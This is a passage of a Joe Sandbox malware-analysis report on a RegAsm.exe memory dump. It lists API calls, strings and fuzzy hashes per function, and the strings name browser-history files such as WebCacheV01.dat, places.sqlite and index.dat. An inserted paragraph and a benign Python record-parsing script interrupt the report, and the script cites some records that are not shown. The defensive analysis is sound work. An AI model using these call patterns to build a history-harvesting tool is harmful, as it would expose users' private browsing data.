                                                                                                                                                                                                  • API ID: HandleModuleProcessTimes
                                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                  • API String ID: 116129598-3385500049
                                                                                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                                  • API String ID: 1475443563-435121686
                                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
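The records above are the Joe Sandbox IDA plugin's per-function annotations for the RegAsm.exe memory dump, and the fields a practitioner actually pivots on are the ones under Similarity: the API String ID and the two fuzzy hashes, plus the strings that tie a function to a behaviour (the memcmp against "SQLite format 3", the WebCacheV01.dat / WebCacheV24.dat path builder, the FindResourceW / LoadResource / LockResource loader). The following Python script is an added example, not Joe Sandbox code and not part of this report: it parses records in the layout shown on this page into structured objects, splits the String ID on the "$" that the report uses to join several strings (inferred from records such as "/nosort$/sort" matching two separate Strings items), and indexes records by any Similarity field so that functions can be located by string or compared with the same fields from another report. The sample input embedded in the script is two records copied from this page with the leading whitespace removed; the class and function names are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records and pivot on their Similarity fields.

Added example for this page, not Joe Sandbox code and not part of the report; the record
layout (section labels, bullet items, '$'-joined String ID, indented 'Part of subcall
function' items) is taken from the report text on this page.
"""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR: " when the call is made by a callee of the function.
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[^(\s]+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")
_STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")  # "text, xrefs: ADDR"

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                       # call-site address
    subcall_of: str | None = None  # callee address for "Part of subcall function" items

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref address)
    source: dict[str, str] = field(default_factory=dict)          # Source File / Snapshot File
    similarity: dict[str, str] = field(default_factory=dict)      # API ID, String ID, hashes

def parse_records(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; bullets are routed by the current section."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every record opens with its APIs section
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            item = line.lstrip("•").strip()
            if section == "APIs":
                if m := _API_RE.match(item):
                    current.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
            elif section == "Strings":
                if m := _STR_RE.match(item):
                    current.strings.append((m["text"], m["ref"]))
            else:  # "key: value" bullets of the remaining sections
                key, _, value = item.partition(":")
                target = current.similarity if section == "Similarity" else current.source
                target[key.strip()] = value.strip()
    return records

def string_ids(record: FunctionRecord) -> list[str]:
    """String ID joins several strings with '$' (page example: '/nosort$/sort')."""
    return [s.strip() for s in record.similarity.get("String ID", "").split("$") if s.strip()]

def index_by(records: list[FunctionRecord], key: str) -> dict[str, list[FunctionRecord]]:
    """Group records on a Similarity field, e.g. 'API String ID' or 'Opcode Fuzzy Hash'."""
    groups: dict[str, list[FunctionRecord]] = defaultdict(list)
    for r in records:
        if r.similarity.get(key):
            groups[r.similarity[key]].append(r)
    return dict(groups)

def find_by_string(records: list[FunctionRecord], needle: str) -> list[FunctionRecord]:
    """Records whose String ID parts or Strings items contain needle, case-insensitively."""
    needle = needle.lower()
    return [r for r in records
            if any(needle in s.lower() for s in string_ids(r) + [t for t, _ in r.strings])]

# Constructed input: two records copied from this page with the leading whitespace removed.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
• memset.MSVCRT ref: 0040E60F
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in find_by_string(recs, "sqlite") + find_by_string(recs, "webcache"):
        print(r.similarity["API String ID"], [a.name for a in r.apis], string_ids(r))
```

Feed it the whole report text (with the indentation intact; the parser strips it) and `index_by(records, "API String ID")` or `index_by(records, "Opcode Fuzzy Hash")` gives the per-function keys that the report's Similarity section exists to expose; the same call over a second report's records yields the overlap, which is how the SQLite-header check and the WebCache path builder seen here can be matched in another RegAsm.exe dump.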
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
• CloseHandle.KERNEL32(000000FF), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                  APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
• Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
• Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
• Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
• Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
• Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
• Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
• Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
• _mbscat.MSVCRT ref: 0040525B
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
• String ID:
• API String ID: 568699880-0
• Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
• Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
• Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
• Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
